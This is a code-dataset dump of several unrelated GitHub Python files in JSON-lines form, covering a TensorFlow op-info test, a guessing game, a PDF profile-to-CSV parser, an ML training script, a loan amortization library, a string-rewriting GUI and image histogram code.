reduction_indices, keep_dims, separator, name]\\n\"\n \" defaults_tuple=(False, '', 'ReduceJoin')\\n\"\n \" attributes=[\\n\"\n \" {index=2, name=keep_dims, type=bool},\\n\"\n \" {index=3, name=separator, type=string},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=inputs, is_list=0},\\n\"\n \" {index=1, name=reduction_indices, is_list=0},]\\n\"\n \" inputs_with_fixed_dtype=[\\n\"\n \" {index=0, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=1, dtype=DT_INT32, is_list=0},]\\n\"),\n # An op with a variable-dtype list input, and an int attribute.\n (\"ParseExampleV2\", \"ParseExampleV2\", \"DebugInfo for ParseExampleV2:\\n\"\n \" param_names=[serialized, names, sparse_keys, dense_keys, \"\n \"ragged_keys, dense_defaults, num_sparse, sparse_types, \"\n \"ragged_value_types, ragged_split_types, dense_shapes, name]\\n\"\n \" defaults_tuple=('ParseExampleV2',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=Tdense, type=list(type)},\\n\"\n \" {index=6, name=num_sparse, type=int},\\n\"\n \" {index=7, name=sparse_types, type=list(type)},\\n\"\n \" {index=8, name=ragged_value_types, type=list(type)},\\n\"\n \" {index=9, name=ragged_split_types, type=list(type)},\\n\"\n \" {index=10, name=dense_shapes, type=list(shape)},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=serialized, is_list=0},\\n\"\n \" {index=1, name=names, is_list=0},\\n\"\n \" {index=2, name=sparse_keys, is_list=0},\\n\"\n \" {index=3, name=dense_keys, is_list=0},\\n\"\n \" {index=4, name=ragged_keys, is_list=0},\\n\"\n \" {index=5, name=dense_defaults, is_list=1},]\\n\"\n \" inputs_with_fixed_dtype=[\\n\"\n \" {index=0, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=1, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=2, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=3, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=4, dtype=DT_STRING, is_list=0},]\\n\"\n \" inputs_with_type_list_attrs=[\\n\"\n \" {type_list_attr=Tdense, tensor_list_params=[5], \"\n \"ok_dtypes=[DT_FLOAT, DT_INT64, DT_STRING]},]\\n\"\n \" inferred_type_list_attrs=[Tdense]\\n\"),\n # An op with a default dtype\n (\"BroadcastArgs\", \"BroadcastArgs\", \"DebugInfo for BroadcastArgs:\\n\"\n \" param_names=[s0, s1, name]\\n\"\n \" defaults_tuple=('BroadcastArgs',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=s0, is_list=0},\\n\"\n \" {index=1, name=s1, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, default_dtype=DT_INT32, tensor_params=[0, 1], \"\n \"ok_dtypes=[DT_INT32, DT_INT64]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n ])\n def testInitializeFromRegisteredOp(self, op_name, debug_info):\n api_info = self.makeConverterForGenOp(op_name)\n self.assertEqual(api_info.DebugInfo().strip(), debug_info.strip())\n\n # This test initializes a PythonAPIInfo from parameter specs,\n # and then uses DebugInfo() to check that the internal state is correct.\n @parameterized.named_parameters([\n (\"NoParams\", \"NoParams\", [], {}, {}, \"DebugInfo for NoParams:\\n\"\n \" param_names=[]\\n\"\n \" defaults_tuple=()\\n\"),\n (\"OnlyNameParam\", \"OnlyNameParam\", [\"name\"], {}, {},\n \"DebugInfo for OnlyNameParam:\\n\"\n \" param_names=[name]\\n\"\n \" defaults_tuple=()\\n\"),\n (\"SomeBinaryOp\", \"SomeBinaryOp\", [\"x\", \"y\"], dict(x=\"T\", y=\"T\"),\n dict(T=\"type\"), \"DebugInfo for SomeBinaryOp:\\n\"\n \" param_names=[x, y]\\n\"\n \" defaults_tuple=()\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=x, is_list=0},\\n\"\n \" {index=1, name=y, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, tensor_params=[0, 1]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n (\"AllAttributeTypes\", \"AllAttributeTypes\", [\n \"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\",\n \"o\", \"p\"\n ], {},\n dict(\n a=\"any\",\n b=\"float\",\n c=\"int\",\n d=\"string\",\n e=\"bool\",\n f=\"type\",\n g=\"shape\",\n h=\"tensor\",\n i=\"list(any)\",\n j=\"list(float)\",\n k=\"list(int)\",\n l=\"list(string)\",\n m=\"list(bool)\",\n n=\"list(type)\",\n o=\"list(shape)\",\n p=\"list(tensor)\"), \"DebugInfo for AllAttributeTypes:\\n\"\n \" param_names=[a, b, c, d, e, f, g, h, i, j, k, l, m, n, o, p]\\n\"\n \" defaults_tuple=()\\n\"\n \" attributes=[\\n\"\n \" {index=0, name=a, type=any},\\n\"\n \" {index=1, name=b, type=float},\\n\"\n \" {index=2, name=c, type=int},\\n\"\n \" {index=3, name=d, type=string},\\n\"\n \" {index=4, name=e, type=bool},\\n\"\n \" {index=5, name=f, type=type},\\n\"\n \" {index=6, name=g, type=shape},\\n\"\n \" {index=7, name=h, type=tensor},\\n\"\n \" {index=8, name=i, type=list(any)},\\n\"\n \" {index=9, name=j, type=list(float)},\\n\"\n \" {index=10, name=k, type=list(int)},\\n\"\n \" {index=11, name=l, type=list(string)},\\n\"\n \" {index=12, name=m, type=list(bool)},\\n\"\n \" {index=13, name=n, type=list(type)},\\n\"\n \" {index=14, name=o, type=list(shape)},\\n\"\n \" {index=15, name=p, type=list(tensor)},]\\n\"),\n ])\n def testInitializeFromParamSpecs(self, api_name, param_names, input_specs,\n attr_specs, debug_info):\n api_info = self.makeConverterFromParamSpecs(api_name, param_names,\n input_specs, attr_specs)\n self.assertEqual(api_info.DebugInfo().strip(), debug_info.strip())\n\n\nif __name__ == \"__main__\":\n googletest.main()\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/framework/python_api_info_test.py","file_name":"python_api_info_test.py","file_ext":"py","file_size_in_byte":10395,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"34780998350","text":"import random\nprint(\"I'm thinking of number between 1 and 5\")\nmyNum = random.randint(1,5)\nnoOfAttempt = 1\nwhile True:\n guess = int(input('Take a guess: \\n'))\n if myNum == guess:\n print('Good job! You guessed my number in ' + str(noOfAttempt) + ' attempts')\n break\n elif myNum > guess:\n print('Your guess is too low')\n else:\n print ('your guess is too high')\n noOfAttempt+= 1","repo_name":"fahimkk/automateTheBoringStuff","sub_path":"chapter_2/guessTheNumberWhile.py","file_name":"guessTheNumberWhile.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3950633969","text":"import pdfminer\nfrom pdfminer.high_level import extract_text\nimport sys, os\nfrom pathlib import Path\nfrom subprocess import call\n\nfrom common.enums.status import Status\n\nfrom common.services.components.system_exception import SystemException\nfrom common.services.selenium_service import SeleniumService\nfrom common.services.site.instagram_service import InstagramService\n\nfrom scheduler.services.task_service import TaskService\n\nfrom django.core.management.base import BaseCommand\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\n\n\n\n\n\nservice = InstagramService()\nlogger = service.logger\n\n\nclass Command(BaseCommand):\n help = 'Task runner'\n\n def add_arguments(self, parser):\n parser.add_argument('-d', '--develop', action='store_true')\n\n def handle(self, *args, **options):\n # logger.info('Start: Task runner')\n print('Start: Task runner')\n\n driver = None\n\n if options['develop']:\n # logger.info('Develop mode')\n print('Develop mode')\n\n try:\n\n dir_path = os.path.join(os.getcwd(), 'scheduler/pdf/output')\n\n records = []\n records.append(\n \",\".join(['no', 'name', 'birth_day', 'birth_place', 'blood_type', 'special_skill', 'cf', 'height', 'bust', 'west',\n 'hip', 'shoe_size', 'head_circumference', 'around_the_neck', 'girder_length', 'sleeve_length',\n 'inseam', 'shoulder_width'])\n )\n\n for file_name in os.listdir(dir_path):\n print(file_name)\n file_path = os.path.join(dir_path, file_name)\n\n # ファイルをオープンする\n file_data = open(file_path, \"r\")\n\n no = file_name.replace('out', '').replace('.txt', '')\n name = ''\n is_birth_day = False\n birth_day = ''\n is_birth_place = False\n birth_place = ''\n blood_type = ''\n is_special_skill = False\n special_skill = ''\n is_cf = False\n cfs = []\n height = ''\n bust = ''\n west = ''\n hip = ''\n shoe_size = ''\n head_circumference = ''\n around_the_neck = ''\n girder_length = ''\n sleeve_length = ''\n inseam = ''\n shoulder_width = ''\n\n # 一行ずつ読み込んでは表示する\n for line in file_data:\n print(line)\n if name == '':\n name = (line or '').strip()\n\n if '【生年月日】' in line:\n is_birth_day = True\n\n if is_birth_day and '【生年月日】' not in line and birth_day == '':\n birth_day = (line or '').strip().replace(' ', ' ').split(' ')[0]\n birth_day = birth_day.replace('年', '/').replace('月', '/').replace('日生', '')\n continue\n\n if '【 出身地 】' in line:\n is_birth_place = True\n\n if is_birth_place and '【 出身地 】' not in line and birth_place == '':\n birth_place = (line or '').strip()\n continue\n\n if blood_type == '':\n candidate_blood_type = (line or '').strip()\n if candidate_blood_type in ['A', 'B', 'AB', 'O']:\n blood_type = candidate_blood_type\n continue\n\n if '【 特技 】' in line or '【 特技 】' in line:\n is_special_skill = True\n\n if is_special_skill and ('【 特技 】' not in line and '【 特技 】' not in line) and special_skill == '':\n special_skill = (line or '').strip()\n if special_skill == '【 サイズ 】':\n special_skill = ''\n\n if '【CF】' in line:\n is_cf = True\n\n if is_cf and '【CF】' not in line:\n candidate_cf = (line or '').strip()\n if '・' in candidate_cf:\n cfs.append(candidate_cf)\n\n if '【 サイズ 】' in line:\n is_birth_day = False\n is_birth_place = False\n is_special_skill = False\n is_cf = False\n continue\n\n if '身  長:' in line or '長:' in line:\n height = ((line or '').split('長:')[1] or '').replace('cm', '').strip()\n continue\n\n if 'バ ス ト:' in line:\n bust = ((line or '').split('バ ス ト:')[1] or '').replace('cm', '').strip()\n continue\n\n if 'ウエスト:' in line:\n west = ((line or '').split('ウエスト:')[1] or '').replace('cm', '').strip()\n continue\n\n if 'ヒ ッ プ:' in line:\n hip = ((line or '').split('ヒ ッ プ:')[1] or '').replace('cm', '').strip()\n continue\n\n if '靴サイズ:' in line:\n shoe_size = ((line or '').split('靴サイズ:')[1] or '').replace('cm', '').strip()\n continue\n\n if '頭回り:' in line:\n head_circumference = ((line or '').split('頭回り:')[1] or '').replace('cm', '').strip()\n continue\n\n if '首回り:' in line:\n around_the_neck = ((line or '').split('首回り:')[1] or '').replace('cm', '').strip()\n continue\n\n if '桁 丈:' in line or '桁 丈:' in line:\n girder_length = ((line or '').replace('桁 丈:', '桁 丈:').split('桁 丈:')[1] or '').replace('cm', '').strip()\n continue\n\n if '袖 丈:' in line or '袖 丈:' in line:\n sleeve_length = ((line or '').replace('袖 丈:', '袖 丈:').split('袖 丈:')[1] or '').replace('cm', '').strip()\n continue\n\n if '股 下:' in line or '股 下:' in line:\n inseam = ((line or '').replace('股 下:', '股 下:').split('股 下:')[1] or '').replace('cm', '').strip()\n continue\n\n if '肩 幅:' in line or '肩 幅:' in line:\n shoulder_width = ((line or '').replace('肩 幅:', '肩 幅:').split('肩 幅:')[1] or '').replace('cm', '').strip()\n continue\n\n records.append(\n \",\".join([no, name, birth_day, birth_place, blood_type, special_skill, ' / '.join(cfs), height, bust, west, hip, shoe_size,\n head_circumference, around_the_neck, girder_length, sleeve_length, inseam,\n shoulder_width])\n )\n\n # records.append(\"\\n\".join(record))\n\n csv_text = \"\\n\".join(records)\n\n pdf_write_path = os.path.join(os.getcwd(), 'scheduler/pdf/out/extract.csv')\n\n with open(pdf_write_path, mode='w') as f:\n f.write(csv_text)\n\n\n\n return\n\n service.throw(3, file_name, message)\n\n\n\n except SystemException as se:\n logger.error(se.__str__())\n if driver is not None:\n driver.close()\n\n except Exception as e:\n logger.error(e.__str__())\n if driver is not None:\n driver.close()\n\n\n exit(0)\n\n# pdfへの出力\ndef out_to_pdf():\n pdf_read_path = os.path.join(os.getcwd(), 'scheduler/pdf/プロフィール301-9999.pdf')\n\n for i in range(55):\n num = i + 1 + 300\n pdf_read_text = extract_text(pdf_read_path, page_numbers=[i])\n print(pdf_read_text)\n\n pdf_write_path = os.path.join(os.getcwd(), 'scheduler/pdf/out/out' + str(num) + '.txt')\n\n with open(pdf_write_path, mode='w') as f:\n f.write(pdf_read_text)\n","repo_name":"fukan-data/fukan-data-sobayonin-v8-1","sub_path":"app/scheduler/management/commands/test_pdf_reader.py","file_name":"test_pdf_reader.py","file_ext":"py","file_size_in_byte":8467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13665238105","text":"import numpy as np \nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split\nimport joblib\n\nimport pipeline # Other file\nimport config # Other file\n\ndef run_training():\n print(\"Training model...\")\n\n data = pd.read_csv(config.TRAINING_DATA_FILE)\n X_train, X_test, y_train, y_test = train_test_split(\n data[config.FEATURES], \n data[config.TARGET],\n test_size=0.1,\n random_state=0\n )\n\n pipeline.breast_cancer_classification.fit(X_train[config.FEATURES], y_train)\n joblib.dump(pipeline.breast_cancer_classification, config.PIPELINE_NAME)\n\n print(\"Training has finished.\")\n\nif __name__ == '__main__':\n run_training()","repo_name":"omartinez182/ml-in-production","sub_path":"train_pipeline.py","file_name":"train_pipeline.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11385075740","text":"# -*- coding: utf-8 -*-\nimport datetime as dt\nimport calendar as cal\nimport collections\nfrom decimal import Decimal\nfrom dateutil.relativedelta import relativedelta\n\nPayment=collections.namedtuple('Payment',['date','payment_amount','interest_amount','principal_amount','special_principal_amount','total_principal_amount','loan_balance_amount'])\n\nSpecial_Payment=collections.namedtuple('Special_Payment',['payment_amount','first_payment_date','special_payment_term','annual_payments'])\nLoan_Summary=collections.namedtuple('Loan_Summary',['loan_amount','total_payment_amount','total_interest_amount','residual_loan_balance'])\n\n# To-do:\n### Actual/Actual\n\nclass Loan(object):\n\n def __init__(self,loan_amount,interest_rate,loan_term,start_date,payment_amount=None,first_payment_date=None,payment_end_of_month=True,end_date=False,interest_only_period=0,annual_payments=12,compounding_method='30E/360'):\n self.loan_amount=Decimal(str(loan_amount))\n self.interest_rate=Decimal(str(interest_rate/100)).quantize(Decimal(str(0.0001)))\n self.laon_term=loan_term\n self.payment_amount=payment_amount\n self.start_date=dt.datetime.strptime(start_date,'%Y-%m-%d')\n self.first_payment_date=dt.datetime.strptime(first_payment_date,'%Y-%m-%d') if first_payment_date is not None else None\n self.payment_end_of_month = payment_end_of_month\n self.end_date=end_date\n self.interest_only_period=interest_only_period\n self.annual_payments=annual_payments\n self.compounding_method=compounding_method\n self.special_payments=[]\n self.special_payments_schedule=[]\n self.no_of_payments=self.laon_term * self.annual_payments\n self.delta_dt=Decimal(str(12/self.annual_payments))\n\n @staticmethod\n def _quantize(amount):\n return Decimal(str(amount)).quantize(Decimal(str(0.01)))\n @staticmethod\n def _get_day_count(dt1,dt2,method,eom=False):\n y1, m1, d1 = dt1.year, dt1.month, dt1.day\n y2, m2, d2 = dt2.year, dt2.month, dt2.day\n dt1_eom_day=cal.monthrange(y1,m1)[1]\n dt2_eom_day=cal.monthrange(y2,m2)[1]\n\n if method in {'30A/360','30U/360','30E/360','30E/360 ISDA'}:\n if method=='30A/360':\n d1 = min(d1,30)\n d2 = min(d2,30) if d1 == 30 else d2\n if method=='30U/360':\n if eom and m1 == 2 and d1==dt1_eom_day and m2==2 and d2==dt2_eom_day:\n d2=30\n if eom and m1 == 2 and d1==dt1_eom_day:\n d1=30\n if d2 == 31 and d1 >= 30:\n d2=30\n if d1==31:\n d1=30\n if method=='30E/360':\n if d1 == 31:\n d1=30\n if d2 == 31:\n d2=30\n if method=='30E/360 ISDA':\n if d1==dt1_eom_day:\n d1=30\n if d2==dt2_eom_day and m2 != 2:\n d2=30\n\n day_count = (360*(y2-y1)+30*(m2-m1)+(d2-d1))\n year_days = 360\n\n if method=='A/365F':\n day_count=(dt2-dt1).days\n year_days=365\n\n if method=='A/360':\n day_count=(dt2-dt1).days\n year_days=360\n\n factor = day_count / year_days\n return factor\n\n @staticmethod\n def _get_special_payment_schedule(self,special_payment):\n no_of_payments=special_payment.special_payment_term * special_payment.annual_payments\n annual_payments = special_payment.annual_payments\n dt0=dt.datetime.strptime(special_payment.first_payment_date,'%Y-%m-%d')\n special_payment_amount=self._quantize(special_payment.payment_amount)\n initial_special_payment=Payment(date=dt0,payment_amount=self._quantize(0),interest_amount=self._quantize(0),principal_amount=self._quantize(0),special_principal_amount=special_payment_amount,total_principal_amount=self._quantize(0),loan_balance_amount=self._quantize(0))\n special_payment_schedule=[initial_special_payment]\n\n for i in range(1,no_of_payments):\n date=dt0+relativedelta(months=i*12/annual_payments)\n special_payment=Payment(date=date,payment_amount=self._quantize(0),interest_amount=self._quantize(0),principal_amount=self._quantize(0),special_principal_amount=special_payment_amount,total_principal_amount=self._quantize(0),loan_balance_amount=self._quantize(0))\n special_payment_schedule.append(special_payment)\n\n return special_payment_schedule\n\n def get_payment_schedule(self):\n initial_payment=Payment(date=self.start_date,payment_amount=self._quantize(0),interest_amount=self._quantize(0),principal_amount=self._quantize(0),special_principal_amount=self._quantize(0),total_principal_amount=self._quantize(0),loan_balance_amount=self._quantize(self.loan_amount))\n payment_schedule=[initial_payment]\n\n if self.payment_amount is None:\n regular_principal_payment_amount= self.loan_amount*((self.interest_rate/self.annual_payments)*(1+(self.interest_rate/self.annual_payments))**(self.no_of_payments))/((1+(self.interest_rate/self.annual_payments))**(self.no_of_payments)-1)\n else:\n regular_principal_payment_amount=self.payment_amount\n\n if self.first_payment_date is None:\n if self.payment_end_of_month==True:\n if self.start_date.day == cal.monthrange(self.start_date.year,self.start_date.month)[1]:\n dt0 = self.start_date\n else:\n dt0 = dt.datetime(self.start_date.year,self.start_date.month,cal.monthrange(self.start_date.year,self.start_date.month)[1],0,0)+relativedelta(months=-12/self.annual_payments)\n else:\n dt0 = self.start_date\n else:\n dt0=self.first_payment_date+relativedelta(months=-12/self.annual_payments)\n\n # take care of special payments\n special_payments_schedule_raw=[]\n special_payments_schedule=[]\n special_payments_dates=[]\n if len(self.special_payments_schedule)>0:\n for i in range(len(self.special_payments_schedule)):\n for j in range(len(self.special_payments_schedule[i])):\n special_payments_schedule_raw.append([self.special_payments_schedule[i][j].date,self.special_payments_schedule[i][j].special_principal_amount])\n if self.special_payments_schedule[i][j].date not in special_payments_dates:\n special_payments_dates.append(self.special_payments_schedule[i][j].date)\n\n for i in range(len(special_payments_dates)):\n amt=self._quantize(str(0))\n for j in range(len(special_payments_schedule_raw)):\n if special_payments_schedule_raw[j][0]==special_payments_dates[i]:\n amt+=special_payments_schedule_raw[j][1]\n special_payments_schedule.append([special_payments_dates[i],amt])\n\n # calculate payment schedule\n m=0\n for i in range(1,self.no_of_payments+1):\n\n date=dt0+relativedelta(months=i*12/self.annual_payments)\n if self.payment_end_of_month==True and self.first_payment_date is None:\n eom_day=cal.monthrange(date.year,date.month)[1]\n date=date.replace(day=eom_day)#dt.datetime(date.year,date.month,eom_day)\n\n special_principal_amount= self._quantize(0)\n bop_date = payment_schedule[(i+m)-1].date\n compounding_factor=Decimal(str(self._get_day_count(bop_date,date,self.compounding_method,eom=self.payment_end_of_month)))\n balance_bop=self._quantize(payment_schedule[(i+m)-1].loan_balance_amount)\n\n for j in range(len(special_payments_schedule)):\n if date == special_payments_schedule[j][0]:\n special_principal_amount = special_payments_schedule[j][1]\n if (bop_date < special_payments_schedule[j][0] and special_payments_schedule[j][0] < date):\n # handle special payment inserts\n compounding_factor= Decimal(str(self._get_day_count(bop_date,special_payments_schedule[j][0],self.compounding_method,eom=self.payment_end_of_month)))\n interest_amount = self._quantize(0) if balance_bop == Decimal(str(0)) else self._quantize(balance_bop*self.interest_rate*compounding_factor)\n principal_amount= self._quantize(0)\n special_principal_amount = self._quantize(0) if balance_bop == Decimal(str(0)) else min(special_payments_schedule[j][1]-interest_amount,balance_bop)\n total_principal_amount=min(principal_amount+special_principal_amount,balance_bop)\n total_payment_amount=total_principal_amount+interest_amount\n balance_eop = max(balance_bop-total_principal_amount,self._quantize(0))\n payment = Payment(date=special_payments_schedule[j][0], payment_amount=total_payment_amount,interest_amount=interest_amount,principal_amount=principal_amount,special_principal_amount=special_principal_amount,total_principal_amount=special_principal_amount,loan_balance_amount=balance_eop)\n payment_schedule.append(payment)\n m+=1\n # handle regular payment inserts : update bop_date and bop_date, and special_principal_amount\n bop_date=special_payments_schedule[j][0]\n balance_bop=balance_eop\n special_principal_amount=self._quantize(0)\n compounding_factor=Decimal(str(self._get_day_count(bop_date,date,self.compounding_method,eom=self.payment_end_of_month)))\n\n interest_amount= self._quantize(0) if balance_bop == Decimal(str(0)) else self._quantize(balance_bop*self.interest_rate*compounding_factor)\n principal_amount = self._quantize(0) if balance_bop == Decimal(str(0)) else min(self._quantize(regular_principal_payment_amount)-interest_amount,balance_bop)\n special_principal_amount=min(balance_bop-principal_amount,special_principal_amount)\n total_principal_amount= min(principal_amount+special_principal_amount,balance_bop)\n total_payment_amount=total_principal_amount+interest_amount\n balance_eop = max(balance_bop-total_principal_amount,self._quantize(0))\n\n payment=Payment(date=date,payment_amount=total_payment_amount,interest_amount=interest_amount,principal_amount=principal_amount,special_principal_amount=special_principal_amount,total_principal_amount=total_principal_amount,loan_balance_amount=balance_eop)\n payment_schedule.append(payment)\n\n return payment_schedule\n\n def add_special_payment(self,payment_amount,first_payment_date,special_payment_term,annual_payments):\n special_payment=Special_Payment(payment_amount=payment_amount,first_payment_date=first_payment_date,special_payment_term=special_payment_term,annual_payments=annual_payments)\n self.special_payments.append(special_payment)\n self.special_payments_schedule.append(self._get_special_payment_schedule(self,special_payment))\n\n def get_loan_summary(self):\n payment_schedule=self.get_payment_schedule()\n total_payment_amount=0\n total_interest_amount=0\n total_principal_amount=0\n for payment in payment_schedule:\n total_payment_amount +=payment.payment_amount\n total_interest_amount +=payment.interest_amount\n total_principal_amount +=payment.total_principal_amount\n\n loan_summary=Loan_Summary(loan_amount=self.loan_amount,total_payment_amount=total_payment_amount,total_interest_amount=total_interest_amount,residual_loan_balance=self._quantize(self.loan_amount-total_principal_amount))\n\n return loan_summary\n","repo_name":"sudo-dakix/pyloan","sub_path":"build/lib/pyloan/pyloan.py","file_name":"pyloan.py","file_ext":"py","file_size_in_byte":11829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3439318678","text":"\r\n##################################################################################################################\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\n# Built-in/Generic Imports\r\n\r\n# Libs\r\nimport numpy as np\r\n\r\n# Own modules\r\n\r\n\r\n__version__ = '1.1.1'\r\n__author__ = 'Victor Guillet'\r\n__date__ = '26/04/2020'\r\n\r\n##################################################################################################################\r\n\r\n\r\ndef reduce_grid_scale(array, scale_factor):\r\n vertical_chunk_count = int(array.shape[0] / scale_factor)\r\n horizontal_chunk_count = int(array.shape[1] / scale_factor)\r\n\r\n downscaled_array = np.zeros((vertical_chunk_count, horizontal_chunk_count))\r\n\r\n # --> Iterate through chunks\r\n for chunk_y in range(vertical_chunk_count):\r\n for chunk_x in range(horizontal_chunk_count):\r\n feature_counter = 0\r\n\r\n # --> Iterate through tiles in chunk\r\n for tile_y in range(scale_factor):\r\n for tile_x in range(scale_factor):\r\n if array[(chunk_y * scale_factor) + tile_y][(chunk_x * scale_factor) + tile_x] == 1:\r\n feature_counter += 1\r\n else:\r\n pass\r\n\r\n # -> Flag tile as obstacle if obstacle counter is too high\r\n if feature_counter >= 2:\r\n downscaled_array[chunk_y][chunk_x] = 1\r\n\r\n return downscaled_array\r\n","repo_name":"vguillet/RSAI_Engine","sub_path":"src/Simulation/Environment/Grids/Tools/Grid_tools.py","file_name":"Grid_tools.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"3367904655","text":"from copy import deepcopy\nfrom dataclasses import dataclass\nfrom functools import partial\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom xdot import DotWidget, DotWindow\nfrom xdot.ui.elements import Edge, Node\n\nfrom string_rewrite import get_machine_i, Rewrite, RewriteSystem, Word\n\n\nclass GUI(DotWidget):\n def __init__(self, srs):\n super().__init__()\n self.srs = deepcopy(srs)\n self.srs.prune()\n self.undo_stack = []\n self.refresh()\n\n def refresh(self):\n self.set_dotcode('\\n'.join(self.dot_lines()).encode())\n return True\n\n def on_key_press_event(self, widget, event):\n if event.keyval == Gdk.KEY_s:\n return self.action('simplify')\n elif event.keyval == Gdk.KEY_z:\n return self.on_undo()\n return super().on_key_press_event(widget, event)\n\n def on_click(self, element, event):\n if isinstance(element, Edge):\n if event.button == 1:\n rw, restricted = self.edges[element.src.id, element.dst.id]\n return self.action('split_rule', rw, 'f', restricted.f)\n else:\n rw, restricted = self.edges[element.src.id, element.dst.id]\n return self.action('split_rule', rw, 't', restricted.t)\n elif isinstance(element, Node):\n if event.button == 1:\n return self.action('split_rules', 'f', '0'+self.nodes[element.id])\n else:\n return self.action('split_rules', 'f', self.nodes[element.id]+'0')\n return super().on_click(element, event)\n\n def dot_lines(self):\n self.nodes = {} # id -> Word\n self.edges = {} # (src_id, dst_id) -> (rewrite, restricted_rewrite)\n yield 'digraph G {'\n for i, cat in enumerate(('halting', 'cycling')):\n if self.srs.special_words[cat]:\n for w in self.srs.special_words[cat]:\n self.nodes[str(w).encode()] = w\n yield f'\"{str(w)}\" [peripheries={i+2}]'\n self.nodes.update((str(rw.f).encode(), rw.f) for rw in self.srs.rewrites)\n for rw in self.srs.rewrites:\n for w in self.nodes.values():\n restricted = rw.then(Rewrite(w, w))\n if restricted is not None:\n self.edges[str(rw.f).encode(), str(w).encode()] = (rw, restricted)\n yield f'\"{str(rw.f)}\" -> \"{str(w)}\" [label=\"{str(rw)}\"]'\n yield '}'\n\n def action(self, method, *args):\n self.undo_stack.append((deepcopy(self.srs), f'{method}{args}'))\n print('ACTION', self.undo_stack[-1][1])\n getattr(self.srs, method)(*args)\n self.srs.prune()\n print(self.srs)\n print()\n return self.refresh()\n\n def on_undo(self):\n if self.undo_stack:\n self.srs, action = self.undo_stack.pop()\n print('UNDO', action)\n return self.refresh()\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n ap = ArgumentParser(description='Try to simplify a TM as a string rewriting system.')\n ap.add_argument('-d', '--db', help='Path to DB file', default='all_5_states_undecided_machines_with_global_header')\n ap.add_argument('seeds', help='DB seed numbers', type=int, nargs='+')\n args = ap.parse_args()\n\n for seed in args.seeds:\n machine = get_machine_i(args.db, seed)\n s = RewriteSystem(machine)\n w = GUI(s)\n DotWindow(widget=w).connect('delete-event', Gtk.main_quit)\n Gtk.main()\n","repo_name":"UncombedCoconut/bbchallenge","sub_path":"interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16602303745","text":"from os import getcwd\nfrom sys import path\ncwd = getcwd()\npath.append(cwd)\nfrom Task_1.main.ex_4 import cls_Testa_Circulo,cls_circulo\n\n\n\ndef test_cls_circulo():\n\tc = 1\n\tres = cls_circulo(c)\n\tres.mtd_Calcular_Area_Circulo()\n\tassert round(res.area,2) == 3.14\n\n","repo_name":"devscheffer/SenacRS-Algoritmos-Programacao-3","sub_path":"task_1/test/ex_4_test.py","file_name":"ex_4_test.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"454938624","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef colorHist(path):\n cap = cv2.VideoCapture(path)\n width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n codec = cv2.VideoWriter_fourcc(*'mp4v')\n out = cv2.VideoWriter('./input/SuperCoilsEN/SuperCoilsEN11.mp4', codec, 30, (width, height))\n while cap.isOpened():\n ret, frame = cap.read()\n if ret:\n hist, bins = np.histogram(frame.flatten(), 256, [0, 256])\n\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / cdf.max()\n\n cdf_m = np.ma.masked_equal(cdf, 0)\n cdf_m = (cdf_m - cdf_m.min()) * 255 / (cdf_m.max() - cdf_m.min())\n cdf = np.ma.filled(cdf_m, 0).astype('uint8')\n im = cdf[frame]\n\n f, axarr = plt.subplots(1, 2, figsize=(9, 3))\n\n axarr[0].hist(frame.flatten(), 256, [0, 256], color='r')\n axarr[0].set_xlim([0, 256])\n axarr[0].legend(('histogram'), loc='upper left')\n\n axarr[1].hist(im.flatten(), 256, [0, 256], color='r')\n axarr[1].set_xlim([0, 256])\n axarr[1].legend(('histogram'), loc='upper left')\n plt.show()\n out.write(im)\n else:\n out.release()\n cap.release()\n 